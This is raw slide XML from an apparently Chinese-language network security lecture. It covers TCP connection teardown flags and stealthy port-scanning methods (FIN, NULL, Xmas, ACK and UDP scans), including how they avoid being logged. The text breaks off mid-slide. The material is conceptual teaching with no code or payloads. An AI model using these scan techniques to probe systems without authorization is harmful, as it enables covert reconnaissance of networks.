              <a:off x="2514" y="1954"/>
              <a:ext cx="960" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800">
              <a:solidFill>
                <a:srgbClr val="00FF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80" name="Group 17"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3578" y="1825"/>
              <a:ext cx="262" cy="287"/>
              <a:chOff x="293" y="1677"/>
              <a:chExt cx="262" cy="287"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="227346" name="Oval 18"/>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83" name="Rectangle 19"/>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2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49181" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3936" y="1872"/>
              <a:ext cx="1104"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ACK</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" b="1">
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>分段</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3990975" y="4041775"/>
            <a:ext cx="3933825" cy="738188"/>
            <a:chOff x="2514" y="2257"/>
            <a:chExt cx="2478" cy="465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="227350" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2514" y="2386"/>
              <a:ext cx="960" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800">
              <a:solidFill>
                <a:srgbClr val="00FF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75" name="Group 23"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3578" y="2257"/>
              <a:ext cx="262" cy="287"/>
              <a:chOff x="293" y="1677"/>
              <a:chExt cx="262" cy="287"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="227352" name="Oval 24"/>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78" name="Rectangle 25"/>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3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49176" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3936" y="2304"/>
              <a:ext cx="1056"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FIN</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" b="1">
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>分段</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 27"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="5032375"/>
            <a:ext cx="4010025" cy="455613"/>
            <a:chOff x="960" y="2881"/>
            <a:chExt cx="2526" cy="287"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="227356" name="Line 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2514" y="2962"/>
              <a:ext cx="972" cy="162"/>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70" name="Group 29"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="2881"/>
              <a:ext cx="262" cy="287"/>
              <a:chOff x="293" y="1677"/>
              <a:chExt cx="262" cy="287"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="227358" name="Oval 30"/>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73" name="Rectangle 31"/>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4</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49171" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1318" y="2928"/>
              <a:ext cx="1104"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ACK</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" b="1">
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>分段</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227361" name="AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3430588"/>
            <a:ext cx="1752600" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 86593"/>
              <a:gd name="adj2" fmla="val 42500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227362" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="5183188"/>
            <a:ext cx="1752600" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -106884"/>
              <a:gd name="adj2" fmla="val -16875"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5168967"/>
            <a:ext cx="8229600" cy="1569660"/>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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN(Final)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>＝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表明发送端数据发送完毕，要求释放连接。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST(Reset)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>＝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接出现严重差错，须释放连接再重新建立。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2477202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27361"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="227361"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="227361"/>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nodeType="afterGroup">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227362"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="227362"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2273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61" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="227362" grpId="0" animBg="1" autoUpdateAnimBg="0"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向目标主机端口发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包到达关闭端口会被丢掉，返回一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>若到达开放端口，只简单丢掉，不返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>优点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三次握手协议任何部分，无法记录，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要求由超级用户或者授权用户访问专门的系统调用；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>适用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标主机，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows95/NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>环境下无效：不论端口是否打开，操作系统都返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342018" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP FIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0B8C2254-116A-492B-88DE-E9144E5B43E2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1195618184"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指物理临近网络、系统或设备进行未授权的更改、收集或拒绝访问。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338946" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>物理临近</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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450EA0C8-B9C6-49CB-8CC8-E230B1C920B5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3338201680"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向目标主机目标端口发送没有任何标志位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC 793</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，若端口关闭，回应一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Xmas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向目标主机发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分组，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC 793</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，若端口是关闭的，那么应该返回一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标志</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当一个包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的数据包到达目标主机的监听端口时，数据包被丢弃，同时发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐蔽扫描</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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3643451809"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向目标端口发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口关闭，会触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP port unreachable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>优点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
